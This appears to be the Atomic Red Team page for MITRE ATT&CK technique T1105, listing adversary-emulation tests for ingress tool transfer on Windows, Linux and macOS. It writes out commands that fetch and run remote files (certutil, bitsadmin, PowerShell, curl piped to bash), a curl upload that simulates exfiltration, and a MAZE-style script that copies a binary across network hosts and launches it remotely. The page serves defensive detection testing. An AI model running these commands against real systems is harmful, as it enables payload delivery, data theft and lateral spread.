Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)). On Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, [certutil](https://attack.mitre.org/software/S0160), and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such asIEX(New-Object Net.WebClient).downloadString()andInvoke-WebRequest. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas) Adversaries may also abuse installers and package managers, such as `yum` or `winget`, to download tools to victim hosts. Adversaries have also abused file application features, such as the Windows `search-ms` protocol handler, to deliver malicious files to victims through remote file searches invoked by [User Execution](https://attack.mitre.org/techniques/T1204) (typically after interacting with [Phishing](https://attack.mitre.org/techniques/T1566) lures).(Citation: T1105: Trellix_search-ms) Files can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.(Citation: Dropbox Malware Sync)
Atomic Test #13 - Download a File with Windows Defender MpCmdRun.exe
Atomic Test #20 - Download a file with Microsoft Connection Manager Auto-Download
Atomic Test #22 - Printer Migration Command-Line Tool UNC share folder into a zip file
Atomic Test #30 - Arbitrary file download using the Notepad++ GUP.exe binary
Utilize rsync to perform a remote file copy (push)
Supported Platforms: Linux, macOS
auto_generated_guid: 0fc6e977-cb12-44f6-b263-2824ba917409
| Name | Description | Type | Default Value | |——|————-|——|—————| | remote_path | Remote path to receive rsync | path | /tmp/victim-files| | remote_host | Remote host to copy toward | string | victim-host| | local_path | Path of folder to copy | path | /tmp/adversary-rsync/| | username | User account to authenticate on remote host | string | victim|
1
sh
1
rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path}
1
sh
1
if [ -x "$(command -v rsync)" ]; then exit 0; else exit 1; fi
1
(pkg install -y rsync)||(sudo apt-get -y install rsync)
Utilize rsync to perform a remote file copy (pull)
Supported Platforms: Linux, macOS
auto_generated_guid: 3180f7d5-52c0-4493-9ea0-e3431a84773f
| Name | Description | Type | Default Value | |——|————-|——|—————| | remote_path | Path of folder to copy | path | /tmp/adversary-rsync/| | remote_host | Remote host to copy from | string | adversary-host| | local_path | Local path to receive rsync | path | /tmp/victim-files| | username | User account to authenticate on remote host | string | adversary|
1
sh
1
rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path}
1
sh
1
if [ -x "$(command -v rsync)" ]; then exit 0; else exit 1; fi
1
(pkg install -y rsync)||(sudo apt-get -y install rsync)
Utilize scp to perform a remote file copy (push)
Supported Platforms: Linux, macOS
auto_generated_guid: 83a49600-222b-4866-80a0-37736ad29344
| Name | Description | Type | Default Value | |——|————-|——|—————| | remote_path | Remote path to receive scp | path | /tmp/victim-files/| | local_file | Path of file to copy | path | /tmp/adversary-scp| | remote_host | Remote host to copy toward | string | victim-host| | username | User account to authenticate on remote host | string | victim|
1
sh
1
scp #{local_file} #{username}@#{remote_host}:#{remote_path}
Utilize scp to perform a remote file copy (pull)
Supported Platforms: Linux, macOS
auto_generated_guid: b9d22b9a-9778-4426-abf0-568ea64e9c33
| Name | Description | Type | Default Value | |——|————-|——|—————| | remote_host | Remote host to copy from | string | adversary-host| | local_path | Local path to receive scp | path | /tmp/victim-files/| | remote_file | Path of file to copy | path | /tmp/adversary-scp| | username | User account to authenticate on remote host | string | adversary|
1
sh
1
scp #{username}@#{remote_host}:#{remote_file} #{local_path}
Utilize sftp to perform a remote file copy (push)
Supported Platforms: Linux, macOS
auto_generated_guid: f564c297-7978-4aa9-b37a-d90477feea4e
| Name | Description | Type | Default Value | |——|————-|——|—————| | remote_path | Remote path to receive sftp | path | /tmp/victim-files/| | local_file | Path of file to copy | path | /tmp/adversary-sftp| | remote_host | Remote host to copy toward | string | victim-host| | username | User account to authenticate on remote host | string | victim|
1
sh
1
sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}'
Utilize sftp to perform a remote file copy (pull)
Supported Platforms: Linux, macOS
auto_generated_guid: 0139dba1-f391-405e-a4f5-f3989f2c88ef
| Name | Description | Type | Default Value | |——|————-|——|—————| | remote_host | Remote host to copy from | string | adversary-host| | local_path | Local path to receive sftp | path | /tmp/victim-files/| | remote_file | Path of file to copy | path | /tmp/adversary-sftp| | username | User account to authenticate on remote host | string | adversary|
1
sh
1
sftp #{username}@#{remote_host}:#{remote_file} #{local_path}
Use certutil -urlcache argument to download a file from the web. Note - /urlcache also works!
Supported Platforms: Windows
auto_generated_guid: dd3b61dd-7bbc-48cd-ab51-49ad1a776df0
| Name | Description | Type | Default Value | |——|————-|——|—————| | remote_file | URL of file to copy | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt| | local_path | Local path to place file | path | Atomic-license.txt|
1
command_prompt
cmd /c certutil -urlcache -split -f #{remote_file} #{local_path}
del #{local_path} >nul 2>&1
Use certutil -verifyctl argument to download a file from the web. Note - /verifyctl also works!
Supported Platforms: Windows
auto_generated_guid: ffd492e3-0455-4518-9fb1-46527c9f241b
| Name | Description | Type | Default Value | |——|————-|——|—————| | remote_file | URL of file to copy | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt| | local_path | Local path to place file | path | Atomic-license.txt|
1
powershell
1
2
3
4
5
$datePath = "certutil-$(Get-Date -format yyyy_MM_dd)"
New-Item -Path $datePath -ItemType Directory
Set-Location $datePath
certutil -verifyctl -split -f #{remote_file}
Get-ChildItem | Where-Object {$_.Name -notlike "*.txt"} | Foreach-Object { Move-Item $_.Name -Destination #{local_path} }
1
Remove-Item "certutil-$(Get-Date -format yyyy_MM_dd)" -Force -Recurse -ErrorAction Ignore
This test uses BITSAdmin.exe to schedule a BITS job for the download of a file. This technique is used by Qbot malware to download payloads.
Supported Platforms: Windows
auto_generated_guid: a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b
| Name | Description | Type | Default Value | |——|————-|——|—————| | bits_job_name | Name of the created BITS job | string | qcxjb7| | local_path | Local path to place file | path | %temp%\Atomic-license.txt| | remote_file | URL of file to copy | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
1
command_prompt
C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{remote_file} #{local_path}
This test uses PowerShell to download a payload. This technique is used by multiple adversaries and malware families.
Supported Platforms: Windows
auto_generated_guid: 42dc4460-9aa6-45d3-b1a6-3955d34e1fe8
| Name | Description | Type | Default Value | |——|————-|——|—————| | remote_file | URL of file to copy | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt| | destination_path | Destination path to file | path | $env:TEMP\Atomic-license.txt|
1
powershell
1
(New-Object System.Net.WebClient).DownloadFile("#{remote_file}", "#{destination_path}")
1
Remove-Item #{destination_path} -Force -ErrorAction Ignore
OSTap copies itself in a specfic way to shares and secondary drives. This emulates the activity.
Supported Platforms: Windows
auto_generated_guid: 2ca61766-b456-4fcf-a35a-1233685e1cad
| Name | Description | Type | Default Value | |——|————-|——|—————| | destination_path | Path to create remote file at. Default is local admin share. | string | \\localhost\C$|
1
command_prompt
pushd #{destination_path}
echo var fileObject = WScript.createobject("Scripting.FileSystemObject");var newfile = fileObject.CreateTextFile("AtomicTestFileT1105.js", true);newfile.WriteLine("This is an atomic red team test file for T1105. It simulates how OSTap worms accross network shares and drives.");newfile.Close(); > AtomicTestT1105.js
CScript.exe AtomicTestT1105.js //E:JScript
del AtomicTestT1105.js /Q >nul 2>&1
del AtomicTestFileT1105.js /Q >nul 2>&1
popd
svchost.exe writing a non-Microsoft Office file to a file with a UNC path.
Upon successful execution, this will rename cmd.exe as svchost.exe and move it to 1
c:\
Supported Platforms: Windows
auto_generated_guid: fa5a2759-41d7-4e13-a19c-e8f28a53566f
1
command_prompt
copy C:\Windows\System32\cmd.exe C:\svchost.exe
C:\svchost.exe /c echo T1105 > \\localhost\c$\T1105.txt
del C:\T1105.txt >nul 2>&1
del C:\\svchost.exe >nul 2>&1
Uses Windows Defender MpCmdRun.exe to download a file from the internet (must have version 4.18 installed). The input arguments “remote_file” and “local_path” can be used to specify the download URL and the name of the output file. By default, the test downloads the Atomic Red Team license file to the temp directory.
More info and how to find your version can be found here https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/
Supported Platforms: Windows
auto_generated_guid: 815bef8b-bf91-4b67-be4c-abe4c2a94ccc
| Name | Description | Type | Default Value | |——|————-|——|—————| | remote_file | URL of file to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt| | local_path | Location to save downloaded file | path | %temp%\Atomic-license.txt|
1
command_prompt
cd "%ProgramData%\Microsoft\Windows Defender\platform\4.18*"
MpCmdRun.exe -DownloadFile -url #{remote_file} -path #{local_path}
del #{local_path} >nul 2>&1
del %temp%\MpCmdRun.log >nul 2>&1
1
command_prompt
cd "%ProgramData%\Microsoft\Windows Defender\platform\4.18*"
MpCmdRun.exe /? >nul 2>&1
Echo "A version of Windows Defender with MpCmdRun.exe must be installed manually"
Download a remote file using the whois utility
Supported Platforms: Linux, macOS
auto_generated_guid: c99a829f-0bb8-4187-b2c6-d47d1df74cab
| Name | Description | Type | Default Value | |——|————-|——|—————| | remote_host | Remote hostname or IP address | string | localhost| | remote_port | Remote port to connect to | integer | 8443| | output_file | Path of file to save output to | path | /tmp/T1105.whois.out| | query | Query to send to remote server | string | Hello from Atomic Red Team test T1105| | timeout | Timeout period before ending process (seconds) | integer | 1|
1
sh
1
timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} "#{query}" > #{output_file}
1
rm -f #{output_file}
1
sh
1
which whois && which timeout
1
echo "Please install timeout and the whois package"
Use PowerShell to download and write an arbitrary file from the internet. Example is from the 2021 Threat Detection Report by Red Canary.
Supported Platforms: Windows
auto_generated_guid: 54a4daf1-71df-4383-9ba7-f1a295d8b6d2
| Name | Description | Type | Default Value | |——|————-|——|—————| | target_remote_file | File to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt| | output_file | File to write to | string | LICENSE.txt|
1
powershell
1
(New-Object Net.WebClient).DownloadString('#{target_remote_file}') | Out-File #{output_file}; Invoke-Item #{output_file}
Simulate a file download using finger.exe. Connect to localhost by default, use custom input argument to test finger connecting to an external server. Because this is being tested on the localhost, you should not be expecting a successful connection https://www.exploit-db.com/exploits/48815 https://www.bleepingcomputer.com/news/security/windows-10-finger-command-can-be-abused-to-download-or-steal-files/
Supported Platforms: Windows
auto_generated_guid: 5f507e45-8411-4f99-84e7-e38530c45d01
| Name | Description | Type | Default Value | |——|————-|——|—————| | remote_host | Remote hostname or IP address | string | localhost|
1
command_prompt
finger base64_filedata@#{remote_host}
Use IMEWDBLD.exe (built-in to windows) to download a file. This will throw an error for an invalid dictionary file.
Downloaded files can be found in “%LocalAppData%\Microsoft\Windows\INetCache<8_RANDOM_ALNUM_CHARS>/
Supported Platforms: Windows
auto_generated_guid: 1a02df58-09af-4064-a765-0babe1a0d1e2
| Name | Description | Type | Default Value | |——|————-|——|—————| | remote_url | Location of file to be downloaded. | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/T1105.yaml| | file_name | Name of the file to be downloaded without extension. | string | T1105|
1
powershell
1
2
$imewdbled = $env:SystemRoot + "\System32\IME\SHARED\IMEWDBLD.exe"
& $imewdbled #{remote_url}
1
2
3
$inetcache = $env:LOCALAPPDATA + "\Microsoft\Windows\INetCache\"
$file_to_be_removed = [string[]] (Get-ChildItem -Path $inetcache -Include #{file_name}* -Recurse -Force -File -ErrorAction SilentlyContinue)
if("" -ne "$file_to_be_removed") { Remove-Item "$file_to_be_removed" -ErrorAction Ignore }
The following Atomic utilizes native curl.exe, or downloads it if not installed, to download a remote DLL and output to a number of directories to simulate malicious behavior. Expected output will include whether the file downloaded successfully or not.
Supported Platforms: Windows
auto_generated_guid: 2b080b99-0deb-4d51-af0f-833d37c4ca6a
| Name | Description | Type | Default Value | |——|————-|——|—————| | file_download | File to download | string | https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll| | curl_path | path to curl.exe | path | C:\Windows\System32\Curl.exe|
1
command_prompt
#{curl_path} -k #{file_download} -o c:\users\public\music\allthethingsx64.dll
#{curl_path} -k #{file_download} --output c:\users\public\music\allthethingsx64.dll
#{curl_path} -k #{file_download} -o c:\programdata\allthethingsx64.dll
#{curl_path} -k #{file_download} -o %Temp%\allthethingsx64.dll
del c:\users\public\music\allthethingsx64.dll >nul 2>&1
del c:\users\public\music\allthethingsx64.dll >nul 2>&1
del c:\programdata\allthethingsx64.dll >nul 2>&1
del %Temp%\allthethingsx64.dll >nul 2>&1
1
powershell
1
if (Test-Path #{curl_path}) {exit 0} else {exit 1}
1
2
3
4
5
Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"
Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\curl.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\curl"
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\curl\curl-7.79.1-win64-mingw\bin\curl.exe" C:\Windows\System32\Curl.exe
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl"
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"
The following Atomic utilizes native curl.exe, or downloads it if not installed, to upload a txt file to simulate data exfiltration Expected output will include whether the file uploaded successfully or not.
Supported Platforms: Windows
auto_generated_guid: 635c9a38-6cbf-47dc-8615-3810bc1167cf
| Name | Description | Type | Default Value | |——|————-|——|—————| | curl_path | path to curl.exe | path | C:\Windows\System32\Curl.exe| | remote_destination | Remote destination | string | www.example.com| | file_path | File to upload | string | c:\temp\atomictestfile.txt|
1
command_prompt
#{curl_path} -T #{file_path} #{remote_destination}
#{curl_path} --upload-file #{file_path} #{remote_destination}
#{curl_path} -d #{file_path} #{remote_destination}
#{curl_path} --data #{file_path} #{remote_destination}
1
powershell
1
if (Test-Path #{curl_path}) {exit 0} else {exit 1}
1
2
3
4
5
Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile PathToAtomicsFolder\..\ExternalPayloads\curl.zip
Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\curl.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\curl"
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\curl\curl-7.79.1-win64-mingw\bin\curl.exe" C:\Windows\System32\Curl.exe
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl"
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"
1
if (Test-Path #{file_path}) {exit 0} else {exit 1}
1
echo "This is an Atomic Test File" > #{file_path}
Uses the cmdl32 to download arbitrary file from the internet. The cmdl32 package is allowed to install the profile used to launch the VPN connection. However, the config is modified to download the arbitary file. The issue of cmdl32.exe detecting and deleting the payload by identifying it as not a VPN Servers profile is avoided by setting a temporary TMP folder and denying the delete permission to all files for the user. Upon successful execution the test will open calculator and Notepad executable for 10 seconds. reference: https://twitter.com/ElliotKillick/status/1455897435063074824 https://github.com/LOLBAS-Project/LOLBAS/pull/151 https://lolbas-project.github.io/lolbas/Binaries/Cmdl32/ https://strontic.github.io/xcyclopedia/library/cmdl32.exe-FA1D5B8802FFF4A85B6F52A52C871BBB.html
Supported Platforms: Windows
auto_generated_guid: d239772b-88e2-4a2e-8473-897503401bcc
| Name | Description | Type | Default Value | |——|————-|——|—————| | Path_to_file | Path to the Batch script | path | PathToAtomicsFolder\T1105\src\T1105.bat|
1
command_prompt
"#{Path_to_file}" 1>NUL
del /f/s/q %temp%\T1105 >nul 2>&1
rmdir /s/q %temp%\T1105 >nul 2>&1
1
powershell
1
if (Test-Path "#{Path_to_file}") {exit 0} else {exit 1}
1
2
New-Item -Type Directory (split-path "#{Path_to_file}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/T1105.bat" -OutFile "#{Path_to_file}"
This test simulates MAZE ransomware’s propogation script that searches through a list of computers, tests connectivity to them, and copies a binary file to the Windows\Temp directory of each one. Upon successful execution, a specified binary file will attempt to be copied to each online machine, a list of the online machines, as well as a list of offline machines will be output to a specified location. Reference: https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html
Supported Platforms: Windows
auto_generated_guid: 70f4d07c-5c3e-4d53-bb0a-cdf3ada14baf
| Name | Description | Type | Default Value | |——|————-|——|—————| | binary_file | Binary file to copy to remote machines | string | $env:comspec| | exe_remote_folder | Path to store executable on remote machine (no drive letter) | string | \Windows\Temp\T1105.exe| | remote_drive_letter | Remote drive letter | string | C|
1
powershell
1
2
3
4
5
6
7
8
9
10
$machine_list = "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt"
$offline_list = "PathToAtomicsFolder\..\ExternalPayloads\T1105OfflineHosts.txt"
$completed_list = "PathToAtomicsFolder\..\ExternalPayloads\T1105CompletedHosts.txt"
foreach ($machine in get-content -path "$machine_list")
{if (test-connection -Count 1 -computername $machine -quiet)
{cmd /c copy "#{binary_file}" "\\$machine\#{remote_drive_letter}$#{exe_remote_folder}"
echo $machine >> "$completed_list"
wmic /node: "$machine" process call create "regsvr32.exe /i #{remote_drive_letter}:#{exe_remote_folder}"}
else
{echo $machine >> "$offline_list"}}
1
2
3
4
5
6
if (test-path "PathToAtomicsFolder\..\ExternalPayloads\T1105CompletedHosts.txt")
{foreach ($machine in get-content -path "PathToAtomicsFolder\..\ExternalPayloads\T1105CompletedHosts.txt")
{wmic /node: "$machine" process where name='"regsvr32.exe"' call terminate | out-null
Remove-Item -path "\\$machine\#{remote_drive_letter}$#{exe_remote_folder}" -force -erroraction silentlycontinue}}
Remove-Item -path "PathToAtomicsFolder\..\ExternalPayloads\T1105OfflineHosts.txt" -erroraction silentlycontinue
Remove-item -path "PathToAtomicsFolder\..\ExternalPayloads\T1105CompletedHosts.txt" -erroraction silentlycontinue
1
powershell
1
if (Test-Path #{binary_file}) {exit 0} else {exit 1}
1
write-host "The binary_file input parameter must be set to a binary that exists on this computer."
1
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt") {exit 0} else {exit 1}
1
2
3
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
new-item -path "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt" | Out-Null
echo "A machine list file has been generated at "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt". Please enter the machines to target there, one machine per line."
Create a ZIP file from a folder in a remote drive
Supported Platforms: Windows
auto_generated_guid: 49845fc1-7961-4590-a0f0-3dbcf065ae7e
| Name | Description | Type | Default Value | |——|————-|——|—————| | Path_unc | Path to the UNC folder | path | \\127.0.0.1\c$\AtomicRedTeam\atomics\T1105\src\| | Path_PrintBrm | Path to PrintBrm.exe | path | C:\Windows\System32\spool\tools\PrintBrm.exe|
1
command_prompt
del %TEMP%\PrintBrm.zip >nul 2>&1
#{Path_PrintBrm} -b -d #{Path_unc} -f %TEMP%\PrintBrm.zip -O FORCE
del %TEMP%\PrintBrm.zip >nul 2>&1
Copy file.cab to destination Reference: https://lolbas-project.github.io/lolbas/Binaries/Replace/
Supported Platforms: Windows
auto_generated_guid: 54782d65-12f0-47a5-b4c1-b70ee23de6df
| Name | Description | Type | Default Value | |——|————-|——|—————| | replace_cab | Path to the cab file | path | PathToAtomicsFolder\T1105\src\redcanary.cab| | Path_replace | Path to replace.exe | path | C:\Windows\System32\replace.exe|
1
command_prompt
del %TEMP%\redcanary.cab >nul 2>&1
#{Path_replace} "#{replace_cab}" %TEMP% /A
del %TEMP%\redcanary.cab >nul 2>&1
1
powershell
1
if (Test-Path "#{replace_cab}") {exit 0} else {exit 1}
1
2
New-Item -Type Directory (split-path "#{replace_cab}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/redcanary.cab" -OutFile "#{replace_cab}"
Copy UNC file to destination Reference: https://lolbas-project.github.io/lolbas/Binaries/Replace/
Supported Platforms: Windows
auto_generated_guid: ed0335ac-0354-400c-8148-f6151d20035a
| Name | Description | Type | Default Value | |——|————-|——|—————| | replace_cab | UNC Path to the cab file | path | \\127.0.0.1\c$\AtomicRedTeam\atomics\T1105\src\redcanary.cab| | Path_replace | Path to replace.exe | path | C:\Windows\System32\replace.exe|
1
command_prompt
del %TEMP%\redcanary.cab >nul 2>&1
#{Path_replace} #{replace_cab} %TEMP% /A
del %TEMP%\redcanary.cab >nul 2>&1
Use certreq to download a file from the web
Supported Platforms: Windows
auto_generated_guid: 6fdaae87-c05b-42f8-842e-991a74e8376b
| Name | Description | Type | Default Value | |——|————-|——|—————| | local_path | Local path to place file | string | %temp%\Atomic-license.txt| | remote_file | URL of file to copy | url | https://example.com|
1
command_prompt
certreq.exe -Post -config #{remote_file} c:\windows\win.ini #{local_path}
del #{local_path} >nul 2>&1
Use wscript to run a local VisualBasic file to download a remote file
Supported Platforms: Windows
auto_generated_guid: 97116a3f-efac-4b26-8336-b9cb18c45188
| Name | Description | Type | Default Value | |——|————-|——|—————| | vbscript_file | Full path to the VisualBasic downloading the file | string | PathToAtomicsFolder\T1105\src\T1105-download-file.vbs|
1
command_prompt
wscript.exe "#{vbscript_file}"
del Atomic-License.txt >nul 2>&1
1
powershell
1
if (Test-Path "#{vbscript_file}") {exit 0} else {exit 1}
1
2
New-Item -Type Directory (split-path "#{vbscript_file}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/T1105-download-file.vbs" -OutFile "#{vbscript_file}"
Utilize linux Curl to download a remote file, chmod +x it and run it.
Supported Platforms: Linux
auto_generated_guid: bdc373c5-e9cf-4563-8a7b-a9ba720a90f3
| Name | Description | Type | Default Value | |——|————-|——|—————| | remote_url | url of remote payload | string | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/src/atomic.sh| | payload_name | payload name | string | atomic.sh|
1
sh
1
curl -sO #{remote_url}; chmod +x #{payload_name} | bash #{payload_name}
1
rm #{payload_name}
Use nimgrab.exe to download a file from the web.
Supported Platforms: Windows
auto_generated_guid: b1729c57-9384-4d1c-9b99-9b220afb384e
| Name | Description | Type | Default Value | |——|————-|——|—————| | remote_file | URL of file to copy | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt| | destination_path | Destination path to file | path | $env:TEMP\Atomic-license.txt|
1
command_prompt
cmd /c "PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe" #{remote_file} #{destination_path}
del #{destination_path} >nul 2>&1
1
powershell
1
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe") {exit 0} else {exit 1}
1
2
3
4
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://nim-lang.org/download/nim-1.6.6_x64.zip" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\nim.zip"
Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\nim.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\nim" -Force
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\nim\nim-1.6.6\bin\nimgrab.exe" "PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe"
Use ‘iwr’ or “Invoke-WebRequest” -URI argument to download a file from the web. Note: without -URI also works in some versions.
Supported Platforms: Windows
auto_generated_guid: c01cad7f-7a4c-49df-985e-b190dcf6a279
| Name | Description | Type | Default Value | |——|————-|——|—————| | remote_file | URL of file to copy | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt| | local_path | Local path to place file | path | %temp%\Atomic-license.txt|
1
command_prompt
powershell.exe iwr -URI #{remote_file} -Outfile #{local_path}
del %temp%\Atomic-license.txt >nul 2>&1
GUP is an open source signed binary used by Notepad++ for software updates, and can be used to download arbitrary files(.zip) from internet/github. Reference Upon execution, a sample zip file will be downloaded to C:\Temp\Sample folder
Supported Platforms: Windows
auto_generated_guid: 66ee226e-64cb-4dae-80e3-5bf5763e4a51
| Name | Description | Type | Default Value | |——|————-|——|—————| | target_file_url | URL of the target ZIP file (Eg: https://example.com/test.zip) | url | https://getsamplefiles.com/download/zip/sample-2.zip| | working_dir | The directory where GUP.exe & it’s dependecies exists | path | PathToAtomicsFolder\T1105\bin\| | gup_executable | GUP is an open source signed binary used by Notepad++ for software updates | String | PathToAtomicsFolder\T1105\bin\GUP.exe| | target_file_sha256 | SHA256 value of target ZIP file | string | CAC4D26F32CA629DFB10FE614ED00EB1066A0C0011386290D3426C3DE2E53AC6|
1
command_prompt
mkdir "c:\Temp"
cd #{working_dir}
GUP.exe -unzipTo "" "C:\Temp" "Sample #{target_file_url} #{target_file_sha256}"
rmdir /s /q "C:\Temp\Sample" >nul 2>nul
1
powershell
1
if (Test-Path "#{gup_executable}") {exit 0} else {exit 1}
1
2
New-Item -Type Directory (split-path "#{gup_executable}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/bin/GUP.exe" -OutFile "#{gup_executable}"
Use nscurl to download and write a file/payload from the internet. -k = Disable certificate checking -o = Output destination
Supported Platforms: macOS
auto_generated_guid: 5bcefe5f-3f30-4f1c-a61a-8d7db3f4450c
| Name | Description | Type | Default Value | |——|————-|——|—————| | remote_file | URL of remote file to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt| | destination_path | Local path to place remote file | path | license.txt|
1
sh
1
nscurl -k "#{remote_file}" -o "#{destination_path}"
1
rm "#{destination_path}"
One of the windows packages ‘Sqlcmd.exe’ can be abused to download malicious files from C2 servers This Atomic will exhibit the similar behavior by downloading a sample zip file from src directory of this Technique folder via GitHub URL
Supported Platforms: Windows
auto_generated_guid: 6934c16e-0b3a-4e7f-ab8c-c414acd32181
| Name | Description | Type | Default Value | |——|————-|——|—————| | remote_url | URL of the C2 Server from where file/s need to be downloaded | url | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/T1105.zip| | local_file_path | The local file path along with filename to where the file needs to be downloaded and placed. | path | C:\T1105.zip|
1
powershell
1
sqlcmd -i #{remote_url} -o #{local_file_path}
1
rm "#{local_file_path}" 2>$null | Out-Null
1
powershell
1
if (Get-Command sqlcmd 2>$null) {exit 0} else {exit 1}
1
winget install Microsoft.Sqlcmd --silent 2>$null | Out-Null